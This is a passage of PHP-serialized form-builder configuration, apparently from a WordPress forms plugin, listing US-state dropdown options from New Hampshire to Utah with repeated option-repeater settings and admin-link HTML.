Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc 